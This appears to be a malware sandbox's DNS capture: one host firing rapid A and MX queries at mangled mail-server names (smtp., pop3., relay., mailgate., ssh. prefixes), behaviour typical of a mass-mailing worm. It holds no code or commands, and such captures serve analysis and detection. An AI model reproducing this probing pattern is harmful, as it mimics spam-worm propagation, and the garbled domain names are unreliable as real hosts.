Nov 30, 2023 11:23:28.985065937 CET	192.168.2.4	1.1.1.1	0xef5d	Standard query (0)	jdmesbowkeo1abrnet.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.991513968 CET	192.168.2.4	1.1.1.1	0x33f	Standard query (0)	pop3.sdas.d20ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.044523001 CET	192.168.2.4	1.1.1.1	0x9567	Standard query (0)	relay.naburly26a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.047193050 CET	192.168.2.4	1.1.1.1	0x29ad	Standard query (0)	relay.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.048193932 CET	192.168.2.4	1.1.1.1	0x42c9	Standard query (0)	relay.hi9tail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.051433086 CET	192.168.2.4	1.1.1.1	0xc8bf	Standard query (0)	pop3.avabme220ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.053776979 CET	192.168.2.4	1.1.1.1	0xdbad	Standard query (0)	relay.yma4j.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.058013916 CET	192.168.2.4	1.1.1.1	0x98d7	Standard query (0)	relay.ciszxujgaiatail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.060725927 CET	192.168.2.4	1.1.1.1	0xf790	Standard query (0)	relay.dtianekicomail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.072427034 CET	192.168.2.4	1.1.1.1	0x4e16	Standard query (0)	relay.ytgaig.tcueain.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.072985888 CET	192.168.2.4	1.1.1.1	0xe734	Standard query (0)	relay.otzaail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.076847076 CET	192.168.2.4	1.1.1.1	0x1cf	Standard query (0)	imap.gadtolsr2l1l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.076875925 CET	192.168.2.4	1.1.1.1	0xa293	Standard query (0)	mailgate.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.077716112 CET	192.168.2.4	1.1.1.1	0x3a6a	Standard query (0)	relay.aal.netc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.079349995 CET	192.168.2.4	1.1.1.1	0x723	Standard query (0)	pop3.gadtolsr2l1l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.080398083 CET	192.168.2.4	1.1.1.1	0x77e2	Standard query (0)	relay.sotuvhlp.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.088589907 CET	192.168.2.4	1.1.1.1	0xdb31	Standard query (0)	pop3.tele8mail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.099719048 CET	192.168.2.4	1.1.1.1	0x8974	Standard query (0)	pop3.s93ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.100879908 CET	192.168.2.4	1.1.1.1	0x2438	Standard query (0)	pop.h.tlgcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.101279020 CET	192.168.2.4	1.1.1.1	0xc796	Standard query (0)	pop3.amerite.varym	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.108093023 CET	192.168.2.4	1.1.1.1	0x17ff	Standard query (0)	22.12l.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:29.108140945 CET	192.168.2.4	1.1.1.1	0xaae	Standard query (0)	gco.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:29.108772993 CET	192.168.2.4	1.1.1.1	0xe6b9	Standard query (0)	relay.hmam.comtmail.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.125185013 CET	192.168.2.4	1.1.1.1	0xcd4c	Standard query (0)	imap.h.tlgcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.127660036 CET	192.168.2.4	1.1.1.1	0xa7e5	Standard query (0)	mailgate.liks.cohlm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.176302910 CET	192.168.2.4	1.1.1.1	0xe220	Standard query (0)	pop3.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.202200890 CET	192.168.2.4	1.1.1.1	0x8efc	Standard query (0)	22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.202222109 CET	192.168.2.4	1.1.1.1	0x19ad	Standard query (0)	relay.eok5ofmail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.202238083 CET	192.168.2.4	1.1.1.1	0x917d	Standard query (0)	reyne5rzkhof1bet.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.205440044 CET	192.168.2.4	1.1.1.1	0x5519	Standard query (0)	mailgate.m1ukgoy8a.ua	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.208215952 CET	192.168.2.4	1.1.1.1	0x1afd	Standard query (0)	mailgate.sdas.d20ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.208565950 CET	192.168.2.4	1.1.1.1	0x888	Standard query (0)	mailgate.z-a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.233093023 CET	192.168.2.4	1.1.1.1	0xe442	Standard query (0)	relay.hitamoelka237lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.245369911 CET	192.168.2.4	1.1.1.1	0xcc23	Standard query (0)	mailgate.aclfpxvr.nedwc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.249898911 CET	192.168.2.4	1.1.1.1	0x3a7a	Standard query (0)	mailgate.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.255867958 CET	192.168.2.4	1.1.1.1	0x1959	Standard query (0)	mailgate.amerite.varym	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.295468092 CET	192.168.2.4	1.1.1.1	0x29ad	Standard query (0)	relay.hmsn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.327246904 CET	192.168.2.4	1.1.1.1	0x77d7	Standard query (0)	mailgate.avabme220ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.328130960 CET	192.168.2.4	1.1.1.1	0x77e2	Standard query (0)	relay.sotuvhlp.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.454085112 CET	192.168.2.4	1.1.1.1	0x3d14	Standard query (0)	smtp.liks.cohlm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.477379084 CET	192.168.2.4	1.1.1.1	0x5fa8	Standard query (0)	mail.co.uycom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.507158995 CET	192.168.2.4	1.1.1.1	0x401d	Standard query (0)	mailgate.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.509187937 CET	192.168.2.4	1.1.1.1	0xd9fc	Standard query (0)	smtp.m1ukgoy8a.ua	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.533920050 CET	192.168.2.4	1.1.1.1	0x6a1d	Standard query (0)	ftp.co.uycom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.534234047 CET	192.168.2.4	1.1.1.1	0x5fe8	Standard query (0)	mail.y.latm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.545114994 CET	192.168.2.4	1.1.1.1	0xbbfd	Standard query (0)	ftp.telenico8a-.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.546118021 CET	192.168.2.4	1.1.1.1	0xd266	Standard query (0)	mailgate.gporaja.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.553971052 CET	192.168.2.4	1.1.1.1	0xe549	Standard query (0)	ftp.g.cojsuuol.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.554339886 CET	192.168.2.4	1.1.1.1	0xc8d3	Standard query (0)	ftp.y.latm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.559631109 CET	192.168.2.4	1.1.1.1	0xe6d4	Standard query (0)	mailgate.tele8mail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.567797899 CET	192.168.2.4	1.1.1.1	0x2564	Standard query (0)	smtp.aclfpxvr.nedwc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.569168091 CET	192.168.2.4	1.1.1.1	0xa2ad	Standard query (0)	ftp.tdwbknlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.573755026 CET	192.168.2.4	1.1.1.1	0xee68	Standard query (0)	mailgate.s93ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.582398891 CET	192.168.2.4	1.1.1.1	0xf831	Standard query (0)	mail.telenico8a-.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.588087082 CET	192.168.2.4	1.1.1.1	0x83f1	Standard query (0)	mail.g.cojsuuol.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.594232082 CET	192.168.2.4	1.1.1.1	0xdab3	Standard query (0)	ftp.gm2008l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.599399090 CET	192.168.2.4	1.1.1.1	0x7c7	Standard query (0)	mail.7slembyjtczr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.602014065 CET	192.168.2.4	1.1.1.1	0x2b60	Standard query (0)	mail.tdwbknlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.602255106 CET	192.168.2.4	1.1.1.1	0x16d2	Standard query (0)	smtp.s93ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.602255106 CET	192.168.2.4	1.1.1.1	0x9e57	Standard query (0)	mailgate.gadtolsr2l1l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.605745077 CET	192.168.2.4	1.1.1.1	0x59d5	Standard query (0)	ftp.jdmesbowkeo1abrnet.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.608407021 CET	192.168.2.4	1.1.1.1	0x12d0	Standard query (0)	ftp.vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.609654903 CET	192.168.2.4	1.1.1.1	0x5e10	Standard query (0)	smtp.gadtolsr2l1l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.610135078 CET	192.168.2.4	1.1.1.1	0x2a34	Standard query (0)	pop3.h.tlgcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.613183022 CET	192.168.2.4	1.1.1.1	0x7b48	Standard query (0)	ftp.7slembyjtczr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.613183022 CET	192.168.2.4	1.1.1.1	0xae9d	Standard query (0)	smtp.tele8mail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.613183022 CET	192.168.2.4	1.1.1.1	0xda47	Standard query (0)	mail.vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.614403963 CET	192.168.2.4	1.1.1.1	0x47bf	Standard query (0)	smtp.avabme220ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.615885973 CET	192.168.2.4	1.1.1.1	0x7004	Standard query (0)	mail.gm2008l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.618261099 CET	192.168.2.4	1.1.1.1	0x58e1	Standard query (0)	mail.jdmesbowkeo1abrnet.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.633317947 CET	192.168.2.4	1.1.1.1	0x9ca9	Standard query (0)	smtp.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.673475981 CET	192.168.2.4	1.1.1.1	0x5c88	Standard query (0)	ssh.7slembyjtczr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.675365925 CET	192.168.2.4	1.1.1.1	0x4f67	Standard query (0)	ssh.telenico8a-.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.695343018 CET	192.168.2.4	1.1.1.1	0xbf27	Standard query (0)	smtp.amerite.varym	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.705586910 CET	192.168.2.4	1.1.1.1	0xf9ad	Standard query (0)	ssh.gm2008l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.705586910 CET	192.168.2.4	1.1.1.1	0xf3b	Standard query (0)	ssh.y.latm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.706353903 CET	192.168.2.4	1.1.1.1	0x635b	Standard query (0)	ssh.g.cojsuuol.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.712515116 CET	192.168.2.4	1.1.1.1	0xfced	Standard query (0)	ssh.jdmesbowkeo1abrnet.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.712515116 CET	192.168.2.4	1.1.1.1	0xc2e3	Standard query (0)	ssh.vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.724478006 CET	192.168.2.4	1.1.1.1	0x6346	Standard query (0)	ssh.tdwbknlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.724478006 CET	192.168.2.4	1.1.1.1	0x9e29	Standard query (0)	smtp.gporaja.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.724687099 CET	192.168.2.4	1.1.1.1	0x596c	Standard query (0)	ssh.co.uycom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.727688074 CET	192.168.2.4	1.1.1.1	0x5af7	Standard query (0)	smtp.sdas.d20ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.728768110 CET	192.168.2.4	1.1.1.1	0x7f75	Standard query (0)	ftp.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.748251915 CET	192.168.2.4	1.1.1.1	0x401d	Standard query (0)	mailgate.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.752192974 CET	192.168.2.4	1.1.1.1	0x6797	Standard query (0)	mailgate.h.tlgcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.752672911 CET	192.168.2.4	1.1.1.1	0xa517	Standard query (0)	relay.liks.cohlm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.753251076 CET	192.168.2.4	1.1.1.1	0xe2b3	Standard query (0)	relay.aclfpxvr.nedwc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.753842115 CET	192.168.2.4	1.1.1.1	0xc2cd	Standard query (0)	relay.sdas.d20ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.755877972 CET	192.168.2.4	1.1.1.1	0xd272	Standard query (0)	relay.z-a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.758044004 CET	192.168.2.4	1.1.1.1	0x10ed	Standard query (0)	relay.amerite.varym	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.758647919 CET	192.168.2.4	1.1.1.1	0x1030	Standard query (0)	ftp.reyne5rzkhof1bet.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.759284973 CET	192.168.2.4	1.1.1.1	0xf0ea	Standard query (0)	mail.reyne5rzkhof1bet.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.796493053 CET	192.168.2.4	1.1.1.1	0xf710	Standard query (0)	relay.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.796493053 CET	192.168.2.4	1.1.1.1	0xa227	Standard query (0)	mail.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.798549891 CET	192.168.2.4	1.1.1.1	0x6bc8	Standard query (0)	relay.m1ukgoy8a.ua	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.801122904 CET	192.168.2.4	1.1.1.1	0x6033	Standard query (0)	relay.avabme220ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.805221081 CET	192.168.2.4	1.1.1.1	0x5feb	Standard query (0)	pop.co.uycom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.810703993 CET	192.168.2.4	1.1.1.1	0x32b8	Standard query (0)	relay.il.cam	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.811383963 CET	192.168.2.4	1.1.1.1	0x9784	Standard query (0)	ssh.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.831234932 CET	192.168.2.4	1.1.1.1	0xf547	Standard query (0)	pop.y.latm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.832453012 CET	192.168.2.4	1.1.1.1	0xa88e	Standard query (0)	ssh.reyne5rzkhof1bet.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.845928907 CET	192.168.2.4	1.1.1.1	0x157d	Standard query (0)	relay.gporaja.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.849490881 CET	192.168.2.4	1.1.1.1	0x89b5	Standard query (0)	relay.s93ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.852793932 CET	192.168.2.4	1.1.1.1	0xf237	Standard query (0)	imap.co.uycom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.856658936 CET	192.168.2.4	1.1.1.1	0xf224	Standard query (0)	smtp.h.tlgcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.875782967 CET	192.168.2.4	1.1.1.1	0xda47	Standard query (0)	mail.vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.875902891 CET	192.168.2.4	1.1.1.1	0x12d0	Standard query (0)	ftp.vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.876147032 CET	192.168.2.4	1.1.1.1	0xa789	Standard query (0)	pop.7slembyjtczr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.925031900 CET	192.168.2.4	1.1.1.1	0x1ad2	Standard query (0)	relay.gadtolsr2l1l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.925031900 CET	192.168.2.4	1.1.1.1	0xad07	Standard query (0)	pop.tdwbknlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.926228046 CET	192.168.2.4	1.1.1.1	0x89cc	Standard query (0)	pop.jdmesbowkeo1abrnet.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.935766935 CET	192.168.2.4	1.1.1.1	0xfd3d	Standard query (0)	imap.y.latm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.937621117 CET	192.168.2.4	1.1.1.1	0x18b3	Standard query (0)	pop.gm2008l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.941323042 CET	192.168.2.4	1.1.1.1	0x52f7	Standard query (0)	pop.g.cojsuuol.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.947581053 CET	192.168.2.4	1.1.1.1	0x28a1	Standard query (0)	relay.tele8mail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.950251102 CET	192.168.2.4	1.1.1.1	0xb4ed	Standard query (0)	imap.7slembyjtczr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.955569029 CET	192.168.2.4	1.1.1.1	0x107a	Standard query (0)	imap.jdmesbowkeo1abrnet.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.964905024 CET	192.168.2.4	1.1.1.1	0xc778	Standard query (0)	pop.telenico8a-.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.965694904 CET	192.168.2.4	1.1.1.1	0xc2e3	Standard query (0)	ssh.vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.965694904 CET	192.168.2.4	1.1.1.1	0x7f75	Standard query (0)	ftp.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.973104954 CET	192.168.2.4	1.1.1.1	0xe96a	Standard query (0)	imap.tdwbknlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.987782001 CET	192.168.2.4	1.1.1.1	0xf4d0	Standard query (0)	imap.gm2008l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.997387886 CET	192.168.2.4	1.1.1.1	0xc2cd	Standard query (0)	relay.sdas.d20ail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.997387886 CET	192.168.2.4	1.1.1.1	0xf0ea	Standard query (0)	mail.reyne5rzkhof1bet.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.047203064 CET	192.168.2.4	1.1.1.1	0xf710	Standard query (0)	relay.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.047627926 CET	192.168.2.4	1.1.1.1	0xa227	Standard query (0)	mail.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.049000978 CET	192.168.2.4	1.1.1.1	0x735	Standard query (0)	pop.vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.055423021 CET	192.168.2.4	1.1.1.1	0x4911	Standard query (0)	relay.h.tlgcom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.055465937 CET	192.168.2.4	1.1.1.1	0x5001	Standard query (0)	imap.telenico8a-.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.060873032 CET	192.168.2.4	1.1.1.1	0x9784	Standard query (0)	ssh.22.12l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.076275110 CET	192.168.2.4	1.1.1.1	0x9b1e	Standard query (0)	pop3.co.uycom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.091475010 CET	192.168.2.4	1.1.1.1	0x9070	Standard query (0)	imap.g.cojsuuol.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.100568056 CET	192.168.2.4	1.1.1.1	0xf8e6	Standard query (0)	pop3.y.latm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.102720976 CET	192.168.2.4	1.1.1.1	0xcdd4	Standard query (0)	imap.vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.123234987 CET	192.168.2.4	1.1.1.1	0xa789	Standard query (0)	pop.7slembyjtczr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.181197882 CET	192.168.2.4	1.1.1.1	0x7482	Standard query (0)	relay.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.184747934 CET	192.168.2.4	1.1.1.1	0x6e3e	Standard query (0)	pop3.tdwbknlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.192630053 CET	192.168.2.4	1.1.1.1	0xb53e	Standard query (0)	mailgate.co.uycom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.197274923 CET	192.168.2.4	1.1.1.1	0x696e	Standard query (0)	pop3.g.cojsuuol.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.205286980 CET	192.168.2.4	1.1.1.1	0xea01	Standard query (0)	pop3.jdmesbowkeo1abrnet.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.220288992 CET	192.168.2.4	1.1.1.1	0x7084	Standard query (0)	pop.reyne5rzkhof1bet.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.260123014 CET	192.168.2.4	1.1.1.1	0x178f	Standard query (0)	pop3.gm2008l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.276860952 CET	192.168.2.4	1.1.1.1	0x8710	Standard query (0)	smtp.y.latm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.276860952 CET	192.168.2.4	1.1.1.1	0x6a4	Standard query (0)	smtp.telenico8a-.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.290684938 CET	192.168.2.4	1.1.1.1	0xf93e	Standard query (0)	8280l.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.293314934 CET	192.168.2.4	1.1.1.1	0x9533	Standard query (0)	smtp.co.uycom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.295217037 CET	192.168.2.4	1.1.1.1	0x5378	Standard query (0)	n.l.pp.el.mki6aok.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.296900988 CET	192.168.2.4	1.1.1.1	0x1c35	Standard query (0)	mailgate.y.latm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.307981968 CET	192.168.2.4	1.1.1.1	0x22c4	Standard query (0)	imap.reyne5rzkhof1bet.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.310921907 CET	192.168.2.4	1.1.1.1	0x735	Standard query (0)	pop.vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.310921907 CET	192.168.2.4	1.1.1.1	0x51ed	Standard query (0)	mailgate.jdmesbowkeo1abrnet.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.311978102 CET	192.168.2.4	1.1.1.1	0x4428	Standard query (0)	smtp.g.cojsuuol.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.313034058 CET	192.168.2.4	1.1.1.1	0xc1e3	Standard query (0)	smtp.jdmesbowkeo1abrnet.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.314109087 CET	192.168.2.4	1.1.1.1	0xbbe	Standard query (0)	smtp.vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.318267107 CET	192.168.2.4	1.1.1.1	0x2821	Standard query (0)	smtp.7slembyjtczr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.319035053 CET	192.168.2.4	1.1.1.1	0xd276	Standard query (0)	8280l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.319597960 CET	192.168.2.4	1.1.1.1	0x6c9f	Standard query (0)	n.l.pp.el.mki6aok.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.321130037 CET	192.168.2.4	1.1.1.1	0x3635	Standard query (0)	pop3.telenico8a-.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.323093891 CET	192.168.2.4	1.1.1.1	0x467f	Standard query (0)	mailgate.tdwbknlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.325959921 CET	192.168.2.4	1.1.1.1	0x3153	Standard query (0)	pop3.7slembyjtczr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.333257914 CET	192.168.2.4	1.1.1.1	0x6fc9	Standard query (0)	mailgate.7slembyjtczr.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.337605953 CET	192.168.2.4	1.1.1.1	0x83	Standard query (0)	smtp.gm2008l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.344249010 CET	192.168.2.4	1.1.1.1	0xcdd4	Standard query (0)	imap.vettguormebuhn.il.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.345812082 CET	192.168.2.4	1.1.1.1	0x1788	Standard query (0)	smtp.tdwbknlil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.355720997 CET	192.168.2.4	1.1.1.1	0x557b	Standard query (0)	mailgate.gm2008l.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.359162092 CET	192.168.2.4	1.1.1.1	0x2c93	Standard query (0)	mailgate.telenico8a-.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.367666006 CET	192.168.2.4	1.1.1.1	0x77fe	Standard query (0)	mailgate.g.cojsuuol.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.375674963 CET	192.168.2.4	1.1.1.1	0xae58	Standard query (0)	hoiocil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.379185915 CET	192.168.2.4	1.1.1.1	0x592a	Standard query (0)	smtp.reyne5rzkhof1bet.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.396998882 CET	192.168.2.4	1.1.1.1	0xd523	Standard query (0)	ccrwatereacee.unk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.397273064 CET	192.168.2.4	1.1.1.1	0x1386	Standard query (0)	mr.r.net	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.398438931 CET	192.168.2.4	1.1.1.1	0x247d	Standard query (0)	aieicod0003l.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:30.423613071 CET	192.168.2.4	1.1.1.1	0x7160	Standard query (0)	hoiocil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.433192015 CET	192.168.2.4	1.1.1.1	0xa5ae	Standard query (0)	relay.co.uycom	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.439718008 CET	192.168.2.4	1.1.1.1	0x696e	Standard query (0)	pop3.g.cojsuuol.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.450495958 CET	192.168.2.4	1.1.1.1	0x3280	Standard query (0)	ccrwatereacee.unk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:30.450495958 CET	192.168.2.4	1.1.1.1	0xea01	Standard query (0)	pop3.jdmesbowkeo1abrnet.com	A (IP address)	IN (0x0001)	false
